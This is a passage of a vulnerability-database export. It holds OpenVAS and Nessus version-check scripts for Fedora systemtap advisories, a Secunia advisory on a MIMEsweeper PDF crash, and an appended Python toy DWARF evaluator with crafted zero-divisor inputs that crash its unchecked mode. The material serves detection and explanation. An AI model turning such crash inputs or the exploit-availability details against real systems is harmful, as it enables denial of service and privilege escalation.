FEDORA-2011-7289\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"systemtap on Fedora 13\";\ntag_insight = \"SystemTap is an instrumentation system for systems running Linux 2.6.\n Developers can write instrumentation to collect data on the operation\n of the system.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-May/060810.html\");\n script_id(863106);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-03 09:20:26 +0200 (Fri, 03 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-7289\");\n script_cve_id(\"CVE-2011-1781\", \"CVE-2011-1769\", \"CVE-2010-4170\", \"CVE-2010-4171\");\n script_name(\"Fedora Update for systemtap FEDORA-2011-7289\");\n\n script_summary(\"Check 
for the Version of systemtap\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"systemtap\", rpm:\"systemtap~1.4~6.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:28", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-06-03T00:00:00", "id": "OPENVAS:1361412562310863107", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863107", "title": "Fedora Update for systemtap FEDORA-2011-7302", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for systemtap FEDORA-2011-7302\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This 
program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-May/060790.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863107\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-03 09:20:26 +0200 (Fri, 03 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-7302\");\n script_cve_id(\"CVE-2011-1781\", \"CVE-2011-1769\", \"CVE-2010-4170\", \"CVE-2010-4171\");\n script_name(\"Fedora Update for systemtap FEDORA-2011-7302\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'systemtap'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"systemtap on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"systemtap\", rpm:\"systemtap~1.4~6.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:55", "bulletinFamily": "scanner", "description": "Check for the Version of systemtap", "modified": "2017-07-10T00:00:00", "published": "2011-06-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=863107", "id": "OPENVAS:863107", "title": "Fedora Update for systemtap FEDORA-2011-7302", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for systemtap FEDORA-2011-7302\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"systemtap on Fedora 14\";\ntag_insight = \"SystemTap is an instrumentation system for systems running Linux 2.6.\n Developers can write instrumentation to collect data on the operation\n of the system.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-May/060790.html\");\n script_id(863107);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-03 09:20:26 +0200 (Fri, 03 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-7302\");\n script_cve_id(\"CVE-2011-1781\", \"CVE-2011-1769\", \"CVE-2010-4170\", \"CVE-2010-4171\");\n script_name(\"Fedora Update for systemtap FEDORA-2011-7302\");\n\n script_summary(\"Check for the Version of systemtap\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"systemtap\", rpm:\"systemtap~1.4~6.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:02", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-06-03T00:00:00", "id": "OPENVAS:1361412562310863106", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863106", "title": "Fedora Update for systemtap FEDORA-2011-7289", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for systemtap FEDORA-2011-7289\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-May/060810.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863106\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-03 09:20:26 +0200 (Fri, 03 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-7289\");\n script_cve_id(\"CVE-2011-1781\", \"CVE-2011-1769\", \"CVE-2010-4170\", \"CVE-2010-4171\");\n script_name(\"Fedora Update for systemtap FEDORA-2011-7289\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'systemtap'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC13\");\n script_tag(name:\"affected\", value:\"systemtap on Fedora 13\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"systemtap\", rpm:\"systemtap~1.4~6.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-01T02:26:54", "bulletinFamily": "scanner", "description": "Two divide-by-zero flaws were found in the way systemtap interpreted\ncertain corrupted DWARF expressions. A privileged user able to execute\narbitrary systemtap scripts could be tricked into triggering this flaw\nto crash the target machine. An unprivileged user (in the stapusr\ngroup) may be able to trigger this flaw to crash the target machine,\nonly if unprivileged mode was enabled by the system administrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2011-7289.NASL", "href": "https://www.tenable.com/plugins/nessus/54835", "published": "2011-05-27T00:00:00", "title": "Fedora 13 : systemtap-1.4-6.fc13 (2011-7289)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-7289.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(54835);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/10/16 10:34:21\");\n\n script_cve_id(\"CVE-2010-4170\", \"CVE-2011-1769\", \"CVE-2011-1781\");\n script_xref(name:\"FEDORA\", value:\"2011-7289\");\n\n script_name(english:\"Fedora 13 : systemtap-1.4-6.fc13 (2011-7289)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote 
Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two divide-by-zero flaws were found in the way systemtap interpreted\ncertain corrupted DWARF expressions. A privileged user able to execute\narbitrary systemtap scripts could be tricked into triggering this flaw\nto crash the target machine. An unprivileged user (in the stapusr\ngroup) may be able to trigger this flaw to crash the target machine,\nonly if unprivileged mode was enabled by the system administrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=702687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=703972\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-May/060810.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b38355e3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected systemtap package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SystemTap MODPROBE_OPTIONS Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:systemtap\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"systemtap-1.4-6.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"systemtap\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:26:54", "bulletinFamily": "scanner", "description": "Two divide-by-zero flaws were found in the way systemtap interpreted\ncertain corrupted DWARF expressions. A privileged user able to execute\narbitrary systemtap scripts could be tricked into triggering this flaw\nto crash the target machine. An unprivileged user (in the stapusr\ngroup) may be able to trigger this flaw to crash the target machine,\nonly if unprivileged mode was enabled by the system administrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2011-7302.NASL", "href": "https://www.tenable.com/plugins/nessus/54836", "published": "2011-05-27T00:00:00", "title": "Fedora 14 : systemtap-1.4-6.fc14 (2011-7302)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-7302.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(54836);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/10/16 10:34:21\");\n\n script_cve_id(\"CVE-2010-4170\", \"CVE-2011-1769\", \"CVE-2011-1781\");\n script_xref(name:\"FEDORA\", value:\"2011-7302\");\n\n script_name(english:\"Fedora 14 : systemtap-1.4-6.fc14 (2011-7302)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two divide-by-zero flaws were found in the way systemtap interpreted\ncertain corrupted DWARF expressions. A privileged user able to execute\narbitrary systemtap scripts could be tricked into triggering this flaw\nto crash the target machine. An unprivileged user (in the stapusr\ngroup) may be able to trigger this flaw to crash the target machine,\nonly if unprivileged mode was enabled by the system administrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=702687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=703972\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-May/060790.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?71daa30b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected systemtap package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SystemTap MODPROBE_OPTIONS Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:systemtap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"systemtap-1.4-6.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"systemtap\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nMIMEsweeper for SMTP PDF File Processing Denial of Service\r\n\r\nSECUNIA ADVISORY ID:\r\nSA13411\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/13411/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nDoS\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nMIMEsweeper for SMTP 
5.x\r\nhttp://secunia.com/product/4235/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been reported in MIMEsweeper for SMTP, which can\r\nbe exploited by malicious people to cause a DoS (Denial of Service).\r\n\r\nThe vulnerability is caused due to an error within the Security\r\nService when processing PDF files. This can be exploited to crash the\r\nSecurity Service by sending an email containing a specially crafted\r\nPDF file as attachment.\r\n\r\nSOLUTION:\r\nApply MIMEsweeper for SMTP 5.0 Service Pack 1:\r\nhttp://www.clearswift.com/download/info.aspx?ID=562\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by vendor.\r\n\r\nORIGINAL ADVISORY:\r\nhttp://download.mimesweeper.com/www/TechnicalDocumentation/SmtpReadMe50SP1.htm\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2004-12-11T00:00:00", "published": "2004-12-11T00:00:00", "id": "SECURITYVULNS:DOC:7314", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7314", "title": "[SA13411] MIMEsweeper for SMTP PDF File Processing Denial of Service", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
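The Fedora systemtap advisories reproduced above describe two divide-by-zero flaws in the way systemtap interprets corrupted DWARF expressions: a script that is translated into a kernel module carries the division into kernel mode, so a zero divisor becomes a machine crash rather than a user-space fault. The following is an added example, not systemtap's translator code: a toy evaluator for the DWARF expression stack machine with the zero-divisor check in place, beside an unchecked mode that shows where a corrupted expression would fault. The advisory names the bug class but not the operators; the example assumes DW_OP_div and DW_OP_mod as the place such a check belongs, and the byte sequences GOOD_EXPR, BAD_DIV and BAD_MOD are constructed inputs.

```python
"""Toy DWARF expression evaluator showing the divide-by-zero check the
systemtap fix adds. Constructed example; not systemtap's translator code."""

# DWARF stack-machine opcodes used here (values from the DWARF standard)
DW_OP_const1u = 0x08
DW_OP_dup     = 0x12
DW_OP_div     = 0x1B
DW_OP_minus   = 0x1C
DW_OP_mod     = 0x1D
DW_OP_mul     = 0x1E
DW_OP_plus    = 0x22
DW_OP_lit0    = 0x30
DW_OP_lit31   = 0x4F

MASK64 = (1 << 64) - 1


class DwarfExprError(ValueError):
    """Raised when an expression is malformed and must be rejected."""


def _need(stack, n):
    if len(stack) < n:
        raise DwarfExprError("stack underflow")


def eval_dwarf_expr(expr: bytes, check_div: bool = True) -> int:
    """Evaluate a DWARF location expression and return the top of stack.

    check_div=True  : reject a zero divisor up front (the fixed behaviour).
    check_div=False : divide blindly; Python's ZeroDivisionError stands in for
                      the fault a translated kernel module would take.
    Values are treated as unsigned 64-bit; DW_OP_div is signed per the spec,
    but that does not change where the zero check belongs.
    """
    stack = []
    i = 0
    while i < len(expr):
        op = expr[i]
        i += 1
        if DW_OP_lit0 <= op <= DW_OP_lit31:
            stack.append(op - DW_OP_lit0)
        elif op == DW_OP_const1u:
            if i >= len(expr):
                raise DwarfExprError("truncated DW_OP_const1u operand")
            stack.append(expr[i])
            i += 1
        elif op == DW_OP_dup:
            _need(stack, 1)
            stack.append(stack[-1])
        elif op in (DW_OP_plus, DW_OP_minus, DW_OP_mul, DW_OP_div, DW_OP_mod):
            _need(stack, 2)
            b = stack.pop()
            a = stack.pop()
            if op in (DW_OP_div, DW_OP_mod):
                if b == 0 and check_div:
                    # The fix: a corrupted or hostile expression must never
                    # reach the division, whoever supplied the debuginfo.
                    raise DwarfExprError("division by zero in DWARF expression")
                r = a // b if op == DW_OP_div else a % b
            elif op == DW_OP_plus:
                r = a + b
            elif op == DW_OP_minus:
                r = a - b
            else:
                r = a * b
            stack.append(r & MASK64)
        else:
            raise DwarfExprError(f"unsupported opcode 0x{op:02x}")
    if not stack:
        raise DwarfExprError("expression left nothing on the stack")
    return stack[-1]


def expr_is_safe(expr: bytes) -> bool:
    """True when the checked evaluator accepts the expression."""
    try:
        eval_dwarf_expr(expr, check_div=True)
        return True
    except DwarfExprError:
        return False


def unchecked_crashes(expr: bytes) -> bool:
    """True when the unchecked evaluator faults on the expression."""
    try:
        eval_dwarf_expr(expr, check_div=False)
        return False
    except ZeroDivisionError:
        return True
    except DwarfExprError:
        return False


# Constructed inputs: a well-formed expression (8 / 2) and two corrupted ones
# whose divisor is literal zero, the shape of input the advisory describes.
GOOD_EXPR = bytes([DW_OP_lit0 + 8, DW_OP_lit0 + 2, DW_OP_div])
BAD_DIV   = bytes([DW_OP_lit0 + 8, DW_OP_lit0, DW_OP_div])
BAD_MOD   = bytes([DW_OP_const1u, 0xFF, DW_OP_lit0, DW_OP_mod])

if __name__ == "__main__":
    print(eval_dwarf_expr(GOOD_EXPR))
    print(expr_is_safe(BAD_DIV), unchecked_crashes(BAD_DIV))
```

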